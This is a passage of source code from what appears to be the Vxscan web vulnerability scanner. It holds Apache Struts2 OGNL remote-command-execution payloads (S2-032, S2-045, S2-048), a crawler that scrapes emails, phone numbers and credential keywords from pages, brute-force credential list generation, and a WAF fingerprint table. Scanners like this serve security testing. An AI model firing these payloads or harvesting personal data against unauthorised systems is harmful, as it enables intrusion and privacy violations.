st032(self): 33 | payload = r"/?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd={}&pp=\\A&ppp=%20&encoding=UTF-8".format( 34 | self.linux) 35 | try: 36 | r = self.req.get(self.url + payload) 37 | if str(self.random) in r.text and len(r.text) < 11: 38 | self.result.append('Apache S2-032 Vulnerability: ' + self.url) 39 | except: 40 | pass 41 | 42 | def st045(self): 43 | try: 44 | cmd = self.linux 45 | header = dict() 46 | header[ 47 | "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" 48 | header[ 49 | "Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + cmd + "'):(#cmd='" + cmd + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" 50 | r = request.Request(self.url, headers=header) 51 | text = request.urlopen(r).read() 52 | except http.client.IncompleteRead as e: 53 | text = e.partial 54 | except Exception: 55 | pass 56 | if 'text' in locals().keys(): 57 | self.random = str(self.random) 58 | if self.random.encode('utf-8') in text and len(text) < 15: 59 | self.result.append('Apache S2-045 Vulnerability: ' + self.url) 60 | 61 | def st048(self): 62 | cmd = self.linux 63 | payload = "name=%25%7B%28%23_%3D%27multipart%2fform-data%27%29.%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27" + cmd + "%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28@org.apache.struts2.ServletActionContext@getResponse%28%29.getOutputStream%28%29%29%29.%28@org.apache.commons.io.IOUtils@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D&age=123&__cheackbox_bustedBefore=true&description=123" 64 | payload = payload.encode('utf-8') 65 | try: 66 | r = request.urlopen(self.url + '/integration/saveGangster.action', payload) 67 | text = r.read() 68 | except http.client.IncompleteRead as e: 69 | text = e.partial 70 | except: 71 | text = b'' 72 | if 'text' in locals().keys(): 73 | self.random = str(self.random) 74 | if self.random.encode('utf-8') in text and len(text) < 15: 75 | self.result.append('Apache S2-048 Vulnerability: ' + self.url) 76 | 77 | def run(self): 78 | self.st032() 79 | self.st045() 80 | self.st016() 81 | self.st048() 82 | return self.result 83 | 84 | 85 | def check(url, ip, ports, apps): 86 | output = [] 87 | probe = get_list(url, ports) 88 | for i in probe: 89 | output.extend(StrutsCheck(i).run()) 90 | return output 91 | -------------------------------------------------------------------------------- /plugins/ActiveReconnaissance/crawl.py: -------------------------------------------------------------------------------- 1 | import concurrent.futures 2 | import logging 3 | import re 4 | from urllib import parse 5 | 6 | from lxml import etree 7 | 8 | from lib.Requests import Requests 9 | from lib.cli_output import console 10 | from lib.sqldb import Sqldb 11 | from plugins.InformationGathering.js_leaks import JsLeaks 12 | 13 | 14 | def dedup_url(urls): 15 | urls = list(set(urls)) 16 | result = [] 17 | okurl = [] 18 | for i in urls: 19 | urlparse = parse.urlparse(i) 20 | path = urlparse.path 21 | if path and path.split('/')[-2]: 22 | key = path.split('/')[-2] 23 | if key not in result: 24 | result.append(key) 25 | okurl.append(i) 26 | else: 27 | okurl.append(i) 28 | return okurl 29 | 30 | 31 | class Crawl: 32 | def __init__(self, host, dbname): 33 | self.urls = [] 34 | self.js = [] 35 | self.domain = '' 36 | self.dbname = dbname 37 | self.host = host 38 | self.result = [] 39 | self.req = Requests() 40 | 41 | def jsparse(self, r): 42 | try: 43 | html = etree.HTML(r.text) 44 | result = html.xpath('//script/@src') 45 | for i in result: 46 | if not re.search( 47 | r'jquery|bootstrap|adsbygoogle|angular|javascript|#|vue|react|51.la/=|map\.baidu\.com|canvas|cnzz\.com|slick\.js|autofill-event\.js|tld\.js|clipboard|Chart\.js', 48 | i): 49 | if '://' not in i: 50 | i = re.sub(r'^/|^\.\./', '', i) 51 | i = self.host + '/' + i 52 | self.js.append(i) 53 | except (AttributeError, AttributeError, ValueError): 54 | pass 55 | except Exception as e: 56 | logging.exception(e) 57 | 58 | def extr(self, url, body): 59 | # html页面内提取邮箱 60 | email = re.findall(r'\b[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+', body) 61 | if email: 62 | self.result.extend(list(map(lambda x: 'URL: ' + url + ' Email: ' + x, email))) 63 | # html页面内提取手机号 64 | phone = re.findall( 65 | r'\b(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}\b', 66 | body) 67 | if phone: 68 | self.result.extend(list(map(lambda x: 'URL: ' + url + ' Phone: ' + x, phone))) 69 | # html注释内提取ip地址 70 | ipaddr = re.findall( 71 | r'(?<=<!--).*((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)).*(?=-->)', 72 | body) 73 | if ipaddr: 74 | self.result.extend(list(map(lambda x: 'IP: ' + x, ipaddr))) 75 | # html注释内提取https连接 76 | links = re.findall(r'(?<=<!--).{0,120}((?:http|https):[\w\./\?\-=&]+).{0,120}(?=-->)', body) 77 | if links: 78 | self.result.extend(list(map(lambda x: 'URL: ' + url + ' Links: ' + x, links))) 79 | # html注释内提取a连接 80 | links2 = re.findall(r'(?<=<!--).{0,120}a\shref="([\-\w\.\?:=\&/]+)".{0,120}(?=-->)', body) 81 | if links2: 82 | self.result.extend(list(map(lambda x: 'URL: ' + url + ' Links: ' + x, links2))) 83 | links3 = re.findall( 84 | r'(?<=<!--).{0,120}\b(?:usr|pwd|uname|uid|file|upload|manager|webadmin|backup|account|admin|password|pass|user|login|secret|private|crash|root|xxx|fix|todo|secret_key|token|auth_token|access_token|username|authkey|user_id|userid|apikey|api_key|sid|eid|passwd|session_key|SESSION_TOKEN|api_token|access_token_secret|private_key|DB_USERNAME|oauth_token|api_secret_key|备注|笔记|备份|后台|登陆|管理|上传|下载|挂马|挂链)\b.{0,120}(?=-->)', 85 | body) 86 | if links3: 87 | self.result.extend(list(map(lambda x: 'URL: ' + url + ' Links: ' + x, links3))) 88 | 89 | def parse_html(self, host): 90 | try: 91 | r = self.req.get(host) 92 | self.jsparse(r) 93 | self.extr(r.url, r.text) 94 | urlparse = parse.urlparse(host) 95 | domain = urlparse.netloc 96 | if not self.domain: 97 | self.domain = domain 98 | html = etree.HTML(r.text) 99 | result = html.xpath('//a/@href') 100 | for link in result: 101 | if not re.search('#|mail*|^/$|javascript', link): 102 | if 'http' not in link: 103 | if urlparse.netloc: 104 | link = urlparse.scheme + '://' + urlparse.netloc + '/' + link 105 | else: 106 | link = 'http://' + host + '/' + link 107 | if domain in link: 108 | if '=' not in link: 109 | self.urls.append(link) 110 | except (UnboundLocalError, AttributeError, ValueError): 111 | pass 112 | except Exception as e: 113 | logging.exception(e) 114 | 115 | self.urls = dedup_url(self.urls) 116 | 117 | return list(set(self.urls)) 118 | 119 | def pool(self): 120 | result = self.parse_html(self.host) 121 | try: 122 | with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor: 123 | futures = [executor.submit(self.parse_html, i) for i in result] 124 | for future in concurrent.futures.as_completed(futures, timeout=3): 125 | future.result() 126 | except (EOFError, concurrent.futures._base.TimeoutError): 127 | pass 128 | except Exception as e: 129 | logging.exception(e) 130 | 131 | jslink = JsLeaks().pool(self.js) 132 | 133 | self.result.extend(jslink) 134 | self.result = list(set(self.result)) 135 | 136 | for i in self.result: 137 | console('Crawl', self.host, i + '\n') 138 | 139 | Sqldb(self.dbname).get_crawl(self.domain, self.result) 140 | 141 | 142 | if __name__ == "__main__": 143 | Crawl('https://www.baidu.com').pool() 144 | -------------------------------------------------------------------------------- /lib/verify.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | 3 | import hashlib 4 | import logging 5 | import random 6 | import re 7 | from urllib import parse 8 | 9 | from lib.Requests import Requests 10 | from lib.cli_output import console 11 | from lib.url import parse_host 12 | 13 | apps = None 14 | ports = ['CDN:0'] 15 | vuln = ['27017', 'Mongodb'] 16 | 17 | 18 | def verify(vuln, port, apps): 19 | if vuln[0] == 'True': 20 | return True 21 | vuln = list(map(lambda x: x.lower(), vuln)) 22 | for i in port: 23 | server, port = i.split(':') 24 | if (server in vuln) or (port in vuln): 25 | return True 26 | if apps: 27 | apps = list(map(lambda x: x.lower(), apps)) 28 | for _ in apps: 29 | if _ in vuln: 30 | return True 31 | return False 32 | 33 | 34 | def get_list(ip, ports): 35 | result = [] 36 | if ('http:80' in ports and 'http:443' in ports) or ('http:80' in ports and 'https:443' in ports): 37 | ports.remove('http:80') 38 | for i in ports: 39 | server, port = i.split(':') 40 | server = server.lower() 41 | ip = parse_host(ip) 42 | if (server == 'http') and not (server == 'http' and port == '443'): 43 | url = server + '://' + ip + ':' + port 44 | if ':80' in url: 45 | url = re.sub(r':80$', '', url) 46 | result.append(url) 47 | if server == 'http' and port == '443': 48 | url = server + 's://' + ip + ':' + port 49 | url = re.sub(r':443', '', url) 50 | result.append(url) 51 | if server == 'https': 52 | url = server + '://' + ip + ':' + port 53 | url = re.sub(r':443$|:80$', '', url) 54 | result.append(url) 55 | 56 | return list(set(result)) 57 | 58 | 59 | def get_hosts(ip, username): 60 | result = [] 61 | password = [] 62 | with open('data/password.txt', 'r', encoding='UTF-8') as f: 63 | for i in f.readlines(): 64 | password.append(i.strip()) 65 | for name in username: 66 | for passwd in password: 67 | result.append('{}|{}|{}'.format(ip, name, passwd)) 68 | return result 69 | 70 | 71 | def verify_https(url): 72 | # 验证域名是http或者https的 73 | # 如果域名是302跳转 则获取跳转后的地址 74 | req = Requests() 75 | # noinspection PyBroadException 76 | if '://' in url: 77 | try: 78 | r = req.get(url) 79 | return url 80 | except Exception as e: 81 | pass 82 | host = parse_host(url) 83 | url2 = parse.urlparse(url) 84 | if url2.netloc: 85 | url = url2.netloc 86 | elif url2.path: 87 | url = url2.path 88 | # noinspection PyBroadException 89 | try: 90 | r = req.get('https://' + url) 91 | getattr(r, 'status_code') 92 | console('Verify', host, 'https://' + url + '\n') 93 | return 'https://' + url 94 | except AttributeError: 95 | # noinspection PyBroadException 96 | try: 97 | req.get('http://' + url) 98 | console('Verify', host, 'http://' + url + '\n') 99 | return 'http://' + url 100 | except Exception: 101 | pass 102 | except Exception as e: 103 | logging.exception(e) 104 | 105 | 106 | def get_md5(): 107 | plain = ''.join([random.choice('0123456789') for _ in range(8)]) 108 | md5sum = hashlib.md5() 109 | md5sum.update(plain.encode('utf-8')) 110 | md5 = md5sum.hexdigest() 111 | return [plain, md5] 112 | 113 | 114 | def verify_ext(apps): 115 | ext = [] 116 | try: 117 | if 'IIS' in apps or 'Microsoft ASP.NET' in apps or 'ASPX' in apps or 'ASP' in apps: 118 | ext.extend(['asp', 'aspx']) 119 | if 'PHP' in apps or 'wamp' in apps or 'phpstudy' in apps or 'Apache' in apps: 120 | ext.append('php') 121 | if 'Apache Tomcat' in apps or 'JSP' in apps or 'Jboss' in apps or 'Weblogic' in apps: 122 | ext.append('jsp') 123 | except TypeError: 124 | pass 125 | except Exception as e: 126 | logging.exception(e) 127 | ext.extend(['txt', 'xml', 'html']) 128 | return ext 129 | 130 | 131 | def verify_country(url): 132 | # 此过滤功能是为了过滤掉一些源码相同但是网站语言不一样的域名 133 | # 国家列表 134 | count = [ 135 | r'^ad\.', r'^ae\.', r'^af\.', r'^ag\.', r'^ai\.', r'^al\.', r'^am\.', r'^ao\.', r'^ar\.', r'^at\.', r'^au\.', 136 | r'^az\.', r'^bb\.', r'^bd\.', r'^be\.', r'^bf\.', r'^bg\.', r'^bh\.', r'^bi\.', r'^bj\.', r'^bl\.', r'^bm\.', 137 | r'^bn\.', r'^bo\.', r'^br\.', r'^bs\.', r'^bw\.', r'^by\.', r'^bz\.', r'^ca\.', r'^cf\.', r'^cg\.', r'^ch\.', 138 | r'^ck\.', r'^cl\.', r'^cm\.', r'^cn\.', r'^co\.', r'^cr\.', r'^cs\.', r'^cu\.', r'^cy\.', r'^cz\.', r'^de\.', 139 | r'^dj\.', r'^dk\.', r'^do\.', r'^dz\.', r'^ec\.', r'^ee\.', r'^eg\.', r'^es\.', r'^et\.', r'^fi\.', r'^fj\.', 140 | r'^fr\.', r'^ga\.', r'^gb\.', r'^gd\.', r'^ge\.', r'^gf\.', r'^gh\.', r'^gi\.', r'^gm\.', r'^gn\.', r'^gr\.', 141 | r'^gt\.', r'^gu\.', r'^gy\.', r'^hk\.', r'^hn\.', r'^ht\.', r'^hu\.', r'^id\.', r'^ie\.', r'^il\.', r'^in\.', 142 | r'^iq\.', r'^ir\.', r'^is\.', r'^it\.', r'^jm\.', r'^jo\.', r'^jp\.', r'^ke\.', r'^kg\.', r'^kh\.', r'^kp\.', 143 | r'^kr\.', r'^kt\.', r'^kw\.', r'^kz\.', r'^la\.', r'^lb\.', r'^lc\.', r'^li\.', r'^lk\.', r'^lr\.', r'^ls\.', 144 | r'^lt\.', r'^lu\.', r'^lv\.', r'^ly\.', r'^ma\.', r'^mc\.', r'^md\.', r'^mg\.', r'^ml\.', r'^mm\.', r'^mn\.', 145 | r'^mo\.', r'^ms\.', r'^mt\.', r'^mu\.', r'^mv\.', r'^mw\.', r'^mx\.', r'^my\.', r'^mz\.', r'^na\.', r'^ne\.', 146 | r'^ng\.', r'^ni\.', r'^nl\.', r'^no\.', r'^np\.', r'^nr\.', r'^nz\.', r'^om\.', r'^pa\.', r'^pe\.', r'^pf\.', 147 | r'^pg\.', r'^ph\.', r'^pk\.', r'^pl\.', r'^pr\.', r'^pt\.', r'^py\.', r'^qa\.', r'^ro\.', r'^ru\.', r'^sa\.', 148 | r'^sb\.', r'^sc\.', r'^sd\.', r'^se\.', r'^sg\.', r'^si\.', r'^sk\.', r'^sl\.', r'^sm\.', r'^sn\.', r'^so\.', 149 | r'^sr\.', r'^st\.', r'^sv\.', r'^sy\.', r'^sz\.', r'^td\.', r'^tg\.', r'^th\.', r'^tj\.', r'^tm\.', r'^tn\.', 150 | r'^to\.', r'^tr\.', r'^tt\.', r'^tw\.', r'^tz\.', r'^ua\.', r'^ug\.', r'^us\.', r'^uy\.', r'^uz\.', r'^vc\.', 151 | r'^ve\.', r'^vn\.', r'^ye\.', r'^yu\.', r'^za\.', r'^zm\.', r'^zr\.', r'^zw\.', r'^en\.' 152 | ] 153 | 154 | if re.search(r'\d+\.\d+\.\d+\.\d+', url): 155 | return False 156 | 157 | for i in count: 158 | if re.search(i, url): 159 | return True 160 | 161 | return False 162 | -------------------------------------------------------------------------------- /lib/waf.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # 格式: waf名|匹配对象|匹配位置|匹配项 3 | # 360|headers|Server|xxxxx 4 | # 360|content|content|'https://www.baidu.com' 5 | WAF_RULE = ( 6 | 'WAF|headers|Server|WAF', r'360|headers|X-Powered-By-360wzb|wangzhan\.360\.cn', '360|headers|X-Powered-By|360', 7 | '360wzws|headers|Server|360wzws', '360 AN YU|content|content|Sorry! your access has been intercepted by AnYu', 8 | '360 AN YU|content|content|AnYu- the green channel', 'Anquanbao|headers|X-Powered-By-Anquanbao|MISS', 9 | 'Armor|headers|Server|armor', 'BaiduYunjiasu|headers|Server|yunjiasu-nginx', 10 | 'BinarySEC|headers|x-binarysec-cache|miss', r'BinarySEC|headers|x-binarysec-via|binarysec\.com', 11 | 'BinarySEC|headers|Server|BinarySec', r'BlockDoS|headers|Server|BlockDos\.net', 12 | 'CloudFlare CDN|headers|Server|cloudflare-nginx', 'CloudFlare CDN|headers|Server|cloudflare', 13 | 'cloudflare CDN|headers|CF-RAY|.+', 'Cloudfront CDN|headers|Server|cloudfront', 14 | 'Cloudfront CDN|headers|X-Cache|cloudfront', r'Cloudfront CDN|headers|X-Cache|Error\sfrom\scloudfront', 15 | 'mod_security|headers|Server|mod_security', 'Barracuda NG|headers|Server|Barracuda', 16 | 'mod_security|headers|Server|Mod_Security', 'F5 BIG-IP APM|headers|Server|BigIP', 17 | 'F5 BIG-IP APM|headers|Server|BIG-IP', 'F5 BIG-IP ASM|headers|X-WA-Info|.+', 18 | 'F5 BIG-IP ASM|headers|X-Cnection|close', 'F5-TrafficShield|headers|Server|F5-TrafficShield', 19 | 'GoDaddy|headers|X-Powered-By|GoDaddy', 'Bluedon IST|headers|Server|BDWAF', 20 | 'Comodo|headers|Server|Protected by COMODO', 'Airee CDN|headers|Server|Airee', 'Beluga CDN|headers|Server|Beluga', 21 | 'Fastly CDN|headers|X-Fastly-Request-ID|\w+', 'limelight CDN|headers|Set-Cookie|limelight', 22 | 'CacheFly CDN|headers|BestCDN|CacheFly', 'maxcdn CDN|headers|X-CDN|maxcdn', 23 | 'DenyAll|headers|Set-Cookie|\Asessioncookie=', 'AdNovum|headers|Set-Cookie|^Navajo.*?$', 24 | 'dotDefender|headers|X-dotDefender-denied|1', 'Incapsula CDN|headers|X-CDN|Incapsula', 25 | 'Jiasule|headers|Set-Cookie|jsluid=', 'KONA|headers|Server|AkamaiGHost', 'ModSecurity|headers|Server|NYOB', 26 | 'ModSecurity|headers|Server|NOYB', 'ModSecurity|headers|Server|.*mod_security', 27 | 'NetContinuum|headers|Cneonction|\Aclose', 'NetContinuum|headers|nnCoection|\Aclose', 28 | 'NetContinuum|headers|Set-Cookie|citrix_ns_id', 'Newdefend|headers|Server|newdefend', 29 | 'NSFOCUS|headers|Server|NSFocus', 'Safe3|headers|X-Powered-By|Safe3WAF', 'Safe3|headers|Server|Safe3 Web Firewall', 30 | 'Safedog|headers|X-Powered-By|WAF/2\.0', 'Safedog|headers|Server|Safedog', 'Safedog|headers|Set-Cookie|Safedog', 31 | 'Safedog|content|content|404.safedog.cn/images/safedogsite/broswer_logo.jpg', 'SonicWALL|headers|Server|SonicWALL', 32 | 'ZenEdge Firewall|headers|Server|ZENEDGE', 'WatchGuard|headers|Server|WatchGuard', 33 | 'Stingray|headers|Set-Cookie|\AX-Mapping-', 'Art of Defence HyperGuard|headers|Set-Cookie|WODSESSION=', 34 | 'Sucuri|headers|Server|Sucuri/Cloudproxy', 'Usp-Sec|headers|Server|Secure Entry Server', 35 | 'Varnish|headers|X-Varnish|.+', 'Varnish|headers|Server|varnish', 'Wallarm|headers|Server|nginx-wallarm', 36 | 'WebKnight|headers|Server|WebKnight', 'Yundun|headers|Server|YUNDUN', 'Teros WAF|headers|Set-Cookie|st8id=', 37 | 'Imperva SecureSphere|headers|X-Iinfo|.+', 'NetContinuum WAF|headers|Set-Cookie|NCI__SessionId=', 38 | 'Yundun|headers|X-Cache|YUNDUN', 'Yunsuo|headers|Set-Cookie|yunsuo', 'Immunify360|headers|Server|imunify360', 39 | 'ISAServer|headers|Via|.+ISASERVER', 'Qiniu CDN|headers|X-Qiniu-Zone|0', 'azion CDN|headers|Server|azion', 40 | 'HyperGuard Firewall|headers|Set-cookie|ODSESSION=', 'ArvanCloud|headers|Server|ArvanCloud', 41 | 'GreyWizard Firewall|headers|Server|greywizard.*', 'FortiWeb Firewall|headers|Set-Cookie|cookiesession1', 42 | 'Beluga CDN|headers|Server|Beluga', 'DoSArrest Internet Security|headers|X-DIS-Request-ID|.+', 43 | 'ChinaCache CDN|headers|Powered-By-ChinaCache|\w+', 'ChinaCache CDN|headers|Server|ChinaCache', 44 | 'HuaweiCloudWAF|headers|Server|HuaweiCloudWAF', 'HuaweiCloudWAF|headers|Set-Cookie|HWWAFSESID', 45 | 'KeyCDN|headers|Server|KeyCDN', 'Reblaze Firewall|headers|Set-cookie|rbzid=\w+', 46 | 'Distil Firewall|headers|X-Distil-CS|.+', 'SDWAF|headers|X-Powered-By|SDWAF', 47 | 'NGENIX CDN|headers|X-NGENIX-Cache|HIT', 'FortiWeb|headers|Server|FortiWeb.*', 48 | 'Naxsi|headers|X-Data-Origin|naxsi-waf', 'IBM DataPower|headers|X-Backside-Transport|\w+', 49 | 'Cisco ACE XML Gateway|headers|Server|ACE\sXML\sGateway', 'AWS WAF|headers|Server|awselb.*', 50 | 'PowerCDN|headers|Server|PowerCDN', 'Profense|headers|Server|profense', 'CompState|headers|X-SL-CompState|.+', 51 | 'West263CDN|headers|X-Cache|.+WT263CDN-.+', 'DenyALL WAF|content|content|Condition Intercepted', 52 | 'yunsuo|content|content|<img\sclass="yunsuologo"', 'yunsuo|headers|Set-Cookie|yunsuo_session_verify', 53 | 'aesecure|content|content|aesecure_denied.png', 'aesecure|content|content|aesecure_denied.png', 54 | 'aliyun|content|content|errors.aliyun.com', 'aliyun|content|content|cdn.aliyuncs.com', 55 | 'aliyun|headers|Set-Cookie|aliyungf_tc=', 56 | 'Palo Alto Firewall|content|content|has been blocked in accordance with company policy', 57 | 'PerimeterX Firewall|content|content|https://www.perimeterx.com/whywasiblocked', 58 | 'Neusoft SEnginx|content|content|SENGINX-ROBOT-MITIGATION', 59 | 'SiteLock TrueShield|content|content|sitelock-site-verification', 'SonicWall|content|content|nsa_banner', 60 | 'SonicWall|content|content|Web Site Blocked', 'Sophos UTM Firewall|content|content|Powered by UTM Web Protection', 61 | 'd盾|content|content|D盾_拦截提示', 'Alert Logic|content|content|<title>Requested URL cannot be found', 62 | 'Alert Logic|content|content|We are sorry, but the page you are looking for cannot be found', 63 | 'Alert Logic|content|content|Reference ID:', 'Approach|content|content|Approach Web Application Firewall', 64 | 'Approach|content|content|Approach infrastructure team', 65 | 'Topsec-Waf|content|content|Topsec Network Security Technology Co.,Ltd', '七牛CDN|content|content|glb.clouddn.com', 66 | '七牛CDN|content|content|glb.qiniucdn.com', '七牛CDN|content|content|cdn.staticfile.org', 67 | '网宿CDN|headers|Server|Cdn Cache Server', '网宿CDN|headers|Server|WS CDN Server', 68 | '网宿CDN|headers|X-Via|Cdn Cache Server', 'DnP Firewall|content|content|Powered by DnP Firewall', 69 | 'DnP Firewall|content|content|dnp_firewall_redirect', '华为防火墙|headers|Server|Eudemon.+', 70 | 'Incapsula-WAF|headers|set-cookie|incap_ses_', 'Incapsula-WAF|headers|set-cookie|incap_visid_83_', 71 | 'RackCorp-CDN|headers|server|^[\s]*rackcorpcdn', 'RackCorp-CDN|headers|server|^[\s]*rackcorpcdn\/([\d\.]{3,6})') 72 | -------------------------------------------------------------------------------- /report/report.htm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Vxscan Report 7 | 8 | 9 | 24 | 25 | 26 |

27 | 28 | 29 | 38 | 39 | 40 | 41 | 42 |
43 | 75 |
76 | 77 |
78 | 79 | 80 |
81 |
82 | 83 | 84 | 85 | 86 | 87 | 227 | 228 | -------------------------------------------------------------------------------- /plugins/PassiveReconnaissance/wappalyzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | import json 5 | import logging 6 | import re 7 | 8 | from bs4 import BeautifulSoup 9 | 10 | 11 | class WebPage(object): 12 | """ 13 | Simple representation of a web page, decoupled 14 | from any particular HTTP library's API. 15 | """ 16 | 17 | def __init__(self, url, html, headers): 18 | """ 19 | Initialize a new WebPage object. 20 | 21 | Parameters 22 | ---------- 23 | 24 | url : str 25 | The web page URL. 26 | html : str 27 | The web page content (HTML) 28 | headers : dict 29 | The HTTP response headers 30 | """ 31 | # if use response.text, could have some error 32 | self.html = html 33 | self.url = url 34 | self.headers = headers 35 | 36 | # Parse the HTML with BeautifulSoup to find